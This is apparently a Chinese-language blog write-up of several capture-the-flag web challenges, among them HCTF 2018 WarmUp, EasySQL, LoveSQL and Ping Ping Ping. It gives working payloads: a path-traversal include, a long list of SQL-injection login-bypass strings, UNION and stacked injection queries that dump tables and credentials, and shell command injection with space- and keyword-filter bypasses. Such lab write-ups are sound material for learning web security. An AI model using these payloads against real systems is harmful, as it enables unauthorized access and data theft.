目錄
[HCTF 2018]WarmUp
[極客大挑戰 2019]EasySQL
總結萬能密碼
[極客大挑戰 2019]Havefun
[強網杯 2019]隨便注
[ACTF2020 新生賽]Include
[SUCTF 2019]EasySQL
[極客大挑戰 2019]Secret File
[ACTF2020 新生賽]Exec
[極客大挑戰 2019]LoveSQL
[GXYCTF2019]Ping Ping Ping
[HCTF 2018]WarmUp
打開網頁,查看一下源代碼,可以找到一個source.php
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
?
if (in_array($page, $whitelist)) {
return true;
}
?
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
?
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
?
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?> 然后有一個hint.php
payload:
url/?file=source.php?../../../../ffffllllaaaagggg[極客大挑戰 2019]EasySQL
打開是一個登錄界面,我們直接嘗試萬能密碼
直接得到flag
總結萬能密碼
asp aspx萬能密碼
1:"or "a"="a
2:'.).or.('.a.'='.a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or.'a.'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
admin'or 1=1#PHP萬能密碼
admin'/*
密碼*/'
?
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--jsp萬能密碼
1'or'1'='1
?
admin' or 1=1/*[極客大挑戰 2019]Havefun
打開網頁,就是一個小貓,然后我們F12查看一下源代碼,找到了一行注釋
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';}在這里有一個迷惑,Syc{cat_cat_cat_cat}雖然很像flag,但是不是flag
然后我們可以直接get傳參cat=dog
[強網杯 2019]隨便注
上來就是sql注入,然后我們直接
1‘ select union 2#然后我們知道了select被禁用了
然后我們采用堆疊注入show tables
';show tables;#再查欄位
‘;show columns from words;#
‘;show columns from 1919810931114514;#最后發現查最后的flag這個方法行不通吶,看了別人的wp也沒有學明白
最后找到了非預期解,直接得flag
1' or 1=1#[ACTF2020 新生賽]Include
打開是一個tips,然后點擊轉到了?file=flag.php頁面
但是并沒有什么東西,然后我們想到了題目include,直接偽協議讀flag.php得到了原始碼
解碼得flag
[SUCTF 2019]EasySQL
試了好多
輸入1,有回顯
輸入2,也有回顯
但是1’,沒有回顯了
嘗試用order by陳述句查詢多少個欄位然后我直接看了別人的wp,受益匪淺
內置的sql陳述句為:
sql=“select”.post[‘query’]."||flag from Flag";如果$post['query']的資料為*,1,sql陳述句就變成了
select *,1||flag from Flag也就是
select *,1 from Flag查到Flag表中的內容
[極客大挑戰 2019]Secret File
打開網頁只發現了頁面為黑色,字體為紅色
很容易就找到了線索,來到./Archive_room.php頁面
點擊這個secret按鈕,首先到了action頁面,但是特別快的準到end頁面,沒有看清里面的內容
然后我們抓包看一下
又找到了secr3t.php
然后我們直接用偽協議讀flag.php,得到base64編碼,然后解碼
[ACTF2020 新生賽]Exec
這個題直接127.0.01來查詢就行了
127.0.0.1;ls /
127.0.0.1;cat /flag
[極客大挑戰 2019]LoveSQL
進來就是一個登錄頁面,然后我們直接嘗試萬能密碼登錄
發現并不對,但是我們找到了注入點
測驗注入點
/check.php?username=1' union select 1,2,3%23&password=1查詢資料庫及版本
/check.php?username=1' union select 1,database(),version()%23&password=1爆表
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1爆欄位
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1爆資料
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1[GXYCTF2019]Ping Ping Ping
一進來就是讓我們輸ip,很明顯傳參
然后我嘗試了以下
?ip=127.0.0.1//可行
?ip=127.0.0.1;ls//查到了flag
?ip=127.0.0.1;cat flag//被禁掉了空格
?ip=127.0.0.1;cat$IFS$flag//flag被禁了我們直接?ip=1|cat$IFS$1index.php,查看以下index.php
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
?
";
print_r($a);
}
?
?>看到了好多被禁用的
關于flag的繞過
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/345638.html
標籤:其他
上一篇:用疫情防控思路解決挖礦木馬風險
下一篇:python撰寫資訊收集工具